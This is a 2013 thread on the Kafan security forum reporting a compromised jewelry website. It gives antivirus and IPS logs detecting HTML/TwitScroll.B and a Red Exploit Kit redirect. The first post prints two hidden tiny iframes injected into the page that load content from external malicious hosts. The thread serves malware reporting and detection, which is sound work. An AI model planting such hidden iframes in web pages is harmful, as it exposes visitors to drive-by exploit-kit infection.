收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://jewelry-event.com/palladium/faqs.html
返回列表 发新帖
查看: 1034|回复: 1
收起左侧

[已鉴定] http://jewelry-event.com/palladium/faqs.html

[复制链接]
fireold
发表于 2013-7-12 07:00:19 | 显示全部楼层 |阅读模式
  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://nc-guardian.org/hbnn.html?j=2801360>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://tangokombination.bplaced.net/mxuu.html?j=2801360>
  3. </iframe>
复制代码


Avira
2013/7/12 上午 06:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\swfobject[2].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作:
      檔案會移動至 '5a07a731.qua' 名稱底下的隔離區目錄。.

2013/7/12 上午 06:58 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        793
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/7/12 上午 06:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\faqs[1].htm'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '4dea8af0.qua' 名稱底下的隔離區目錄。.

2013/7/12 上午 06:58 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        782
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/7/12 上午 06:57 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\swfobject[2].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:傳輸至掃描程式

2013/7/12 上午 06:57 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\swfobject[2].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:拒絕存取

2013/7/12 上午 06:57 [Web Protection] 發現惡意程式碼
      從 URL "http://jewelry-event.com/palladium/js/swfobject.js" 存取資料時,
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作:已略過

2013/7/12 上午 06:57 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\faqs[1].htm 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:傳輸至掃描程式

2013/7/12 上午 06:57 [Web Protection] 發現惡意程式碼
      從 URL "http://jewelry-event.com/palladium/faqs.html" 存取資料時,
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作:已略過


fs6.jpg
回复

举报

Tom179090
发表于 2013-7-12 10:09:51 | 显示全部楼层
类别: 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/7/12 10:09:16,高,阻止了 jewelry-event.com 的入侵企图,已阻止,不需要操作,Web Attack: Red Exploit Kit Redirect,不需要操作,不需要操作,"jewelry-event.com (97.74.144.134, 80)",jewelry-event.com/palladium/js/swfobject.js,"TOM (192.168.1.103, 50539)",97.74.144.134 (97.74.144.134),"TCP, www-http"
来自 <b>jewelry-event.com/palladium/js/swfobject.js</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。  要停止接收有关此类通信的通知,请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-3-11 09:16 , Processed in 0.120901 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表